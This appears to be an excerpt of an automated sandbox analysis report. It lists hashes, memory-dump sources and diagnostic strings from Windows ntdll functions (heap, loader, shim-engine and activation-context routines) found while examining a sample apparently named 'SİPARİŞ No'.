• Instruction ID: e23a80c72643758d14bc9844932a4d2f2f23da1d1aa719f6a96d5752872962a2
• Opcode Fuzzy Hash: f749d5bf8c09e8c615c1d9ad5e021897543d974aef27f1c1b459bcf156511642
• Instruction Fuzzy Hash: 4751E9B5A00296AFDB14DF5C889497EF7B8BF08244B548269E494D7741D738DE44CBE0
Control-flow Graph (rendered graph of the function starting at 32e0a670, with its RtlDebugPrintTimes call sites, not reproduced)
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: HEAP:
                                                                  • API String ID: 3446177414-2466845122
                                                                  • Opcode ID: 9b8da84af0f9a998c54c3d36b05a278454c56db9d6cacc13615d54aa3391d4d1
                                                                  • Instruction ID: 10ce394b67a77f99702952d872a30fd51a38e16c38fb91fe4d08dee5224e55fd
                                                                  • Opcode Fuzzy Hash: 9b8da84af0f9a998c54c3d36b05a278454c56db9d6cacc13615d54aa3391d4d1
                                                                  • Instruction Fuzzy Hash: 05A1BC75A043158BD704CE29C896A1AB7E5FB88354F59C92DEA45DB310EB30EC4ACBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph omitted): function at 32d67630, basic blocks 32d67630-32d67719 and 32da4638-32da47d0; calls 32d3e660, 32d74c30, 32d67818, 32d677cd, 32d67728, 32d6771b, 32d72c50, 32d74d48, 32d79020, 32d7a770, 32d7aaa0, 32dacf9e, 32dbf290, RtlDebugPrintTimes and BaseQueryModuleData
                                                                  Strings
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32DA46FC
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 32DA4787
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32DA4725
                                                                  • Execute=1, xrefs: 32DA4713
                                                                  • ExecuteOptions, xrefs: 32DA46A0
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32DA4742
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32DA4655
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 69b62ae524eef089183d8013da70ba647e19dc15c3765c6bc170f77e7551cf8a
                                                                  • Instruction ID: 9f00debcf8b1fcefb21424a91e7c451c30f7dbcf6f411ae433583d2a23ba9b8e
                                                                  • Opcode Fuzzy Hash: 69b62ae524eef089183d8013da70ba647e19dc15c3765c6bc170f77e7551cf8a
                                                                  • Instruction Fuzzy Hash: 1F510B7550025DABFB149AA8EC55FF973B8EF04348F9000A9D505A7390DBB0AA45CF60
                                                                  Strings
                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32D97AE6
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32D979D5
                                                                  • SsHd, xrefs: 32D4A3E4
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 32D979D0, 32D979F5
                                                                  • Actx , xrefs: 32D97A0C, 32D97A73
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32D979FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                  • API String ID: 0-1988757188
                                                                  • Opcode ID: 683b08f1e3284677fddee60fcb94cad1dc27c727a118496b842d2bbc52f3150f
                                                                  • Instruction ID: a1d0ab237ddc9435bb0898602e73a8d1bfbaf5da9ec9a9a92ce55945d2b3ac57
                                                                  • Opcode Fuzzy Hash: 683b08f1e3284677fddee60fcb94cad1dc27c727a118496b842d2bbc52f3150f
                                                                  • Instruction Fuzzy Hash: 8FE1A0B56083428FE714CF24C8A5B9A77E1AB88358F504A2DFD99CB390EF31D945CB91
                                                                  APIs
                                                                  Strings
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32D99346
                                                                  • GsHd, xrefs: 32D4D874
                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32D99565
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 32D99341, 32D99366
                                                                  • Actx , xrefs: 32D99508
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32D9936B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                  • API String ID: 3446177414-2196497285
                                                                  • Opcode ID: 7974b0f931be17bc78d35d1227151d1e7d86da6996da48087d731a2ab2ab080a
                                                                  • Instruction ID: 9cd5c249687b9de3a333ee5b42bf041b2c8fd7290f6185a91e20ae13fd420ae1
                                                                  • Opcode Fuzzy Hash: 7974b0f931be17bc78d35d1227151d1e7d86da6996da48087d731a2ab2ab080a
                                                                  • Instruction Fuzzy Hash: 01E17A746043428FE714CF64C880B9AB7E4BB88358F454A6DF896CB399DF71E944CB92
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                  • API String ID: 3446177414-1745908468
                                                                  • Opcode ID: 5d2bf1b13d5cce491c449aef62b2b59ee2f3dc516299d01ffeb9e5667b009c04
                                                                  • Instruction ID: 0479a3eaa0ec488e82ee23e40dd02cddc7c1365abcbf24656fcdd5f690e730ec
                                                                  • Opcode Fuzzy Hash: 5d2bf1b13d5cce491c449aef62b2b59ee2f3dc516299d01ffeb9e5667b009c04
                                                                  • Instruction Fuzzy Hash: FD91CCB6900B80DFEB02CF68C450A99BBF2FF49718F548459E885AB761CB759985CB20
                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 32D2656C
                                                                    • Part of subcall function 32D265B5: RtlDebugPrintTimes.NTDLL ref: 32D26664
                                                                    • Part of subcall function 32D265B5: RtlDebugPrintTimes.NTDLL ref: 32D266AF
                                                                  Strings
                                                                  • LdrpInitShimEngine, xrefs: 32D899F4, 32D89A07, 32D89A30
                                                                  • apphelp.dll, xrefs: 32D26496
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D89A11, 32D89A3A
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 32D89A2A
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32D89A01
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 32D899ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-204845295
                                                                  • Opcode ID: 192ed3f99e699176a109f7d9effa96baae77d559de4c53071db156edb4b4897d
                                                                  • Instruction ID: 7cda767756edbc2f3fb43c58317b1605267ca795beae6c96b83eb97e9d7f9ebe
                                                                  • Opcode Fuzzy Hash: 192ed3f99e699176a109f7d9effa96baae77d559de4c53071db156edb4b4897d
                                                                  • Instruction Fuzzy Hash: 6251B17164C3049FE314DF24D881F9B77E8EB84748F414919F5D6A73A0DA70E985CBA2
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                  • API String ID: 3446177414-4227709934
                                                                  • Opcode ID: b8077ca55f14ff8c14284dc818bd4750e13a10b5cf17011a99834371149492dd
                                                                  • Instruction ID: b4d8ecc3ca7ab7689387440e983162c5c7aae880f7f44d63180ccf26d0ba2978
                                                                  • Opcode Fuzzy Hash: b8077ca55f14ff8c14284dc818bd4750e13a10b5cf17011a99834371149492dd
                                                                  • Instruction Fuzzy Hash: 4A418EB9A01218AFDB01DF99D890EDEBBB5FF48704F110199EC05AB341D772AA51CBA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                  • API String ID: 3446177414-3492000579
                                                                  • Opcode ID: 3ea94c7c11aedcc4c4bd2e53bffcc540ab7528a2c132ba7b7a4aa4fd37ff1288
                                                                  • Instruction ID: 332055ef47fe7f30f513b45b4a2096f9dd1b8f8a8ed4baeb32ea2bbaaaaf6162
                                                                  • Opcode Fuzzy Hash: 3ea94c7c11aedcc4c4bd2e53bffcc540ab7528a2c132ba7b7a4aa4fd37ff1288
                                                                  • Instruction Fuzzy Hash: 7371DD75901B84DFDB02DFA8D4506ADFBF2FF49308F548059E846AB392CB709985CB60
                                                                  APIs
                                                                  Strings
                                                                  • LdrpLoadShimEngine, xrefs: 32D89ABB, 32D89AFC
                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32D89AF6
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D89AC5, 32D89B06
                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32D89AB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-3589223738
                                                                  • Opcode ID: 809b1923f4606f39b4c44edf54b29cceca993fa926d5e55b4ec2aa06406b1d45
                                                                  • Instruction ID: 834393c829f1fc7432f66cc060002541a35bb9fb75de75d8ffec20124dcf6eac
                                                                  • Opcode Fuzzy Hash: 809b1923f4606f39b4c44edf54b29cceca993fa926d5e55b4ec2aa06406b1d45
                                                                  • Instruction Fuzzy Hash: CC514532A413589FDB04EB68C849BDD77B5BB40708F410965E982BF395CBB0AC85CBA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: @32$LdrpUnloadNode$Unmapping DLL "%wZ"$df2@32@32$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 3446177414-4121410990
                                                                  • Opcode ID: 3025c27ccab561a37f00d3f06aff538c87fa14c8e51341c11004c0ec66db20f5
                                                                  • Instruction ID: 2e332e876410655a3e4245016f70168b5a592506de550e11852f1cb8ebc0bc60
                                                                  • Opcode Fuzzy Hash: 3025c27ccab561a37f00d3f06aff538c87fa14c8e51341c11004c0ec66db20f5
                                                                  • Instruction Fuzzy Hash: 865103716043019FEB14EF34C885BA9BBA1BB84314F640A2DE89797784DFF4A845CBE1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                  • API String ID: 3446177414-3224558752
                                                                  • Opcode ID: 35243a31a0f549c222c8f327d601cf55eac178b9d373f49032fb2a6f5218abf4
                                                                  • Instruction ID: 6fbc5af166c236174eb89e7cb0481fa1c8ee9481dadc12f9f68eb6b6124cf722
                                                                  • Opcode Fuzzy Hash: 35243a31a0f549c222c8f327d601cf55eac178b9d373f49032fb2a6f5218abf4
                                                                  • Instruction Fuzzy Hash: 5A4126B5600B80DFEB01DF24C484B9AB7B5EF45368F208569E8455F791CBB4A8C4CBA1
                                                                  Strings
                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 32DDF263
                                                                  • ---------------------------------------, xrefs: 32DDF279
                                                                  • HEAP: , xrefs: 32DDF15D
                                                                  • Entry Heap Size , xrefs: 32DDF26D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                  • API String ID: 3446177414-1102453626
                                                                  • Opcode ID: ba81863efb51ffd4fbe84e80d2cf76eeda63c1a384a5a5c0c73821e4f1c768ca
                                                                  • Instruction ID: fdb349b3fa5f536796e80ed84c96f2367bc9ef1ce0ebd884de50c3e9f3c3d245
                                                                  • Opcode Fuzzy Hash: ba81863efb51ffd4fbe84e80d2cf76eeda63c1a384a5a5c0c73821e4f1c768ca
                                                                  • Instruction Fuzzy Hash: B041AA3AA01B15DFC704EF18C895A09BBB1FF49358B668469D819EF310CB31EC82CB90
                                                                   Memory Dump Source
                                                                   • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                  • API String ID: 3446177414-1222099010
                                                                  • Opcode ID: 8d2619338c1662b57ab8a715de40d959eec8f7015603db3391ac42c5bd18ef1f
                                                                  • Instruction ID: 17dacf27f5f490692249af3c7e2193b2da3f6f4612819426c964a55517aab706
                                                                  • Opcode Fuzzy Hash: 8d2619338c1662b57ab8a715de40d959eec8f7015603db3391ac42c5bd18ef1f
                                                                  • Instruction Fuzzy Hash: BA31FF79105784DFF712DB24C805B9A77E4EF05794F108484F8825B7A1CBF9A884CA61
                                                                   Memory Dump Source
                                                                   • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: b7626d29d210dda5309980ef30e50abb632df222c87ac74798fe4c413613afff
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: 9E81B3B8E053499EEF04CF6CC8917EEBBB1AF45354F54425AD8A0AB390CB3C9941CB60
                                                                   Memory Dump Source
                                                                   • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$@
                                                                  • API String ID: 3446177414-1194432280
                                                                  • Opcode ID: 78990034683dffd76019e1c0aaa945368d9071011a7c3e4c4fe3b7784784ef98
                                                                  • Instruction ID: a0f841a0726da4c7554bffcfdd6d089a64e39a282e396064dfedf2067ce6112e
                                                                  • Opcode Fuzzy Hash: 78990034683dffd76019e1c0aaa945368d9071011a7c3e4c4fe3b7784784ef98
                                                                  • Instruction Fuzzy Hash: 29813D76D012699BDB61CF54CC45BDEB7B4AF08754F0041DAAA0AB7380DB705E84CFA0
                                                                  Strings
                                                                  • LdrpFindDllActivationContext, xrefs: 32DA3636, 32DA3662
                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 32DA3640, 32DA366C
                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32DA362F
                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 32DA365C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 3446177414-3779518884
                                                                  • Opcode ID: ab180bc5b8c9be28e96ff29ae5e836301c19ae423d4949654cba7ddd73b47493
                                                                  • Instruction ID: cc3899015b83a359377b4a52ea8f2a80635ba7b7e30cb3aed2517c9b1a4899ac
                                                                  • Opcode Fuzzy Hash: ab180bc5b8c9be28e96ff29ae5e836301c19ae423d4949654cba7ddd73b47493
                                                                  • Instruction Fuzzy Hash: 2C310266D00351AFFB35AA08C848B7A73A4AB0179CFC68566EC4467760DFA09CC4CF95
                                                                  Strings
                                                                  • apphelp.dll, xrefs: 32D52462
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D9A9A2
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 32D9A992
                                                                  • LdrpDynamicShimModule, xrefs: 32D9A998
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-176724104
                                                                  • Opcode ID: 12c191a8da66e85ef16644f8c5266025e0b944eb9bac7337e52f61b6bac99c67
                                                                  • Instruction ID: c26cbba21aced3d77d86be43128382986c3eacb23ef5393899d7dfabaf52852a
                                                                  • Opcode Fuzzy Hash: 12c191a8da66e85ef16644f8c5266025e0b944eb9bac7337e52f61b6bac99c67
                                                                  • Instruction Fuzzy Hash: EA312676A41301AFEB14AF58C846B9A77B5FB84B44FA20459F902BB350CBB059C6CF90
                                                                  Strings
                                                                  • RTL: Re-Waiting, xrefs: 32DA031E
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 32DA02E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 32DA02BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: df489128f1d1f0bccc48945532f910da425d5ebdae7f7a0666bc179e6274f51d
